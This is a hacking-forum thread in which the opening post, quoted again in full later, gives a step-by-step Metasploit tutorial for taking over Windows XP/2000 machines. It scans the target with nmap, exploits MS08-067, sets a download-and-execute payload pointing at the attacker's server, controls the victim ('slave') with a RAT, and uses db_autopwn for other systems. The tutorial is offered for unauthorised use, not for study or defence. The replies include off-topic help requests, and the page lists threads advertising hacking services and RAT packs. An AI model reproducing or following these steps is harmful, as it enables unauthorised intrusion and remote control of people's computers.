For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Hack a computer using nmap and metasploit
08-13-2012, 07:31 PM,
Post: #1
Hack a computer using nmap and metasploit
Hello !nd!4N H4CK3RS...!!!
This is the tutorial on Hack a Computer Using Nmap and Metasploit - Infecting through IP address. (Specially For Advance Hackers)...

Requirements:
Nmap.
Metasploit.

First of all you need target ip of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control you’re slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Happy Hacking...
Quote
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
10-28-2013, 06:23 PM,
Post: #2
Hack a computer using nmap and metasploit
is this for the same network or remotely??
Quote
10-28-2013, 07:39 PM, (This post was last modified: 12-13-2013, 02:42 PM by Mr.HacKer.)
Post: #3
Hack a computer using nmap and metasploit
THank u Very Much

Drinks Keep Visiting And Grow Up Our CommunityDrinks

My Thread Collection
Blackhat
You Want XXX Dump PM Me Blackhat




Quote
11-24-2013, 12:34 PM,
Post: #4
Hack a computer using nmap and metasploit
Hi house, i'm Ezane and am a newbies here. i would really appreciate it so much if i could get a help from the guru's around on how to brows with my blackberry Bis sim on my pc? though it uses to brows on pc before my services provider blacked it and i believed am in the right site where people can change the world with their wisdom. i will be happy of any assistant i could get. pls inbox me. Ezane
Quote
11-25-2013, 05:52 PM,
Post: #5
Hack a computer using nmap and metasploit
not sure i understand

[Image: displayimage.php?id=5v9aehda5689487761.gif]
Quote
12-13-2013, 03:11 AM,
Post: #6
Hack a computer using nmap and metasploit
Sorry for the late reply is due to internet issues over here where i am. what i was trying to say is that before when i subscribe to my bis i normally use the Sim card on my internet modem to brow on my laptop but after awhile my service provider blocked it and no longer working on pc. pls i need your help. Your pal. Ezane
Quote
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
03-29-2015, 12:10 PM,
Post: #7
Hack a computer using nmap and metasploit
Ravi Kiran Wrote:Hello !nd!4N H4CK3RS...!!!
This is the tutorial on Hack a Computer Using Nmap and Metasploit - Infecting through IP address. (Specially For Advance Hackers)...

Requirements:
Nmap.
Metasploit.

First of all you need target ip of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control you’re slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Happy Hacking...




Hello Ravi,
My name is Pooja from Mumbai
Seems great, can you contact me on my email (pooj.mal@gmail.com) for know step by step. or skype me poo.mal

Thanks a million in advanced.
Quote


Possibly Related Threads...
Thread Author Replies Views Last Post
Twitter hack xfiles696 33 26,975 06-06-2019, 01:43 PM
Last Post: RECRUTA[61]
ways to hack websites & hackin services! shalethad 0 1,567 03-01-2019, 05:07 PM
Last Post: shalethad
HACK LORD !! HIRE // SPECIAL HACKING TREAT shalethad 0 985 02-07-2019, 05:52 PM
Last Post: shalethad
[How To] Gain access into a person computer without them knowing!!! St.Marie 0 1,460 02-06-2018, 07:23 PM
Last Post: St.Marie
[Leak] GIANT Hack pack (Booters, RATS, Spammers, and much more!) ricardosalesman 5 5,158 09-08-2017, 09:27 PM
Last Post: 2010radams
[Tutorial] [FREE]HOW TO HACK ANY FACEBOOK ACCOUNT WITHOUT KEYLOGGER ricardosalesman 2 4,226 02-23-2017, 09:49 PM
Last Post: roxanal3x22

Forum Jump:


Users browsing this thread: 1 Guest(s)
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp


All rights reserved © 2012-2015 OffensiveCommunity, Designed at WallBB Co Uk
Powered By MyBB, © 2002-2019 MyBB Group.